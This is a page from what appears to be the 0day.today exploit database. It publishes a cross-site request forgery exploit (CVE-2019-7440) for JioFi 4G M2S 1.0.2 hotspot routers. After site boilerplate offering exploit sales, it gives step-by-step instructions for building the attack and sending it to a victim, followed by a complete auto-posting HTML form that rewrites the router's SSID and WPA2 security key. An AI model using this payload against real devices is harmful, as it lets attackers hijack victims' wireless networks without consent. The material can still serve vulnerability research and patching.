0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
JioFi 4G M2S 1.0.2 - Cross-Site Request Forgery Vulnerability
Author
Risk
[
Security Risk Low
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: JioFi 4G M2S 1.0.2 devices have CSRF via the SSID name and Security Key field under Edit Wi-Fi Settings (aka a SetWiFi_Setting request to cgi-bin/qcmap_web_cgi) # Exploit Author: Vikas Chaudhary # Vendor Homepage: https://www.jio.com/ # Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29 # Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router # Category: Hardware # Contact: https://www.facebook.com/profile.php?id=100011287630308 # Web: https://gkaim.com/ # Tested on: Windows 10 X64- Firefox-65.0 # CVE-2019-7440 *********************************************************************** ## Vulnerability Description :- The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. The issue is triggered when an unauthorized input passed via multiple POST and GET parameters are not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. ---------------------------------------- # Proof Of Concept:-PoC 1- First Open BurpSuite 2- Make Intercept on 3 -Go to your Wifi Router's Gateway in Browser [i.e http://192.168.225.1 ] 4-Goto wifi edit section and click on apply 5-Now capture the data and generate CSRF PoC 6-Now Change the SSID name and Password (Security Key) According to you 7-Save it as .html and send it to Victim. 8-Victim's profile will be changed according to you ------------------- <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.225.1/cgi-bin/qcmap_web_cgi" method="POST"> <input type="hidden" name="Page" value="SetWiFi_Setting" /> <input type="hidden" name="Mask" value="0" /> <input type="hidden" name="result" value="0" /> <input type="hidden" name="ssid" value=" Myaim_Vikas" /> <input type="hidden" name="mode_802_11" value="11bgn" /> <input type="hidden" name="tx_power" value="HIGH" /> <input type="hidden" name="wmm" value="Enable" /> <input type="hidden" name="wps_enable" value="PushButton" /> <input type="hidden" name="wifi_security" value="WPA2PSK" /> <input type="hidden" name="wpa_encryption_type" value="AES" /> <input type="hidden" name="wpa_security_key" value="12345678" /> <input type="hidden" name="wep_security_key_1" value="0" /> <input type="hidden" name="wep_security_key_2" value="0" /> <input type="hidden" name="wep_security_key_3" value="0" /> <input type="hidden" name="wep_security_key_4" value="0" /> <input type="hidden" name="wep_current_default_key" value="0" /> <input type="hidden" name="channel_mode" value="automatic" /> <input type="hidden" name="channel_selection" value="8" /> <input type="hidden" name="sleep_mode" value="Enable" /> <input type="hidden" name="sleep_mode_timer" value="30" /> <input type="hidden" name="ssid_broadcast" value="Enable" /> <input type="hidden" name="enable_wifi" value="Enable" /> <input type="hidden" name="token" value="052d80c2c7aa1c90" /> <input type="submit" value="Submit request" /> </form> </body> </html> # 0day.today [2024-09-28] #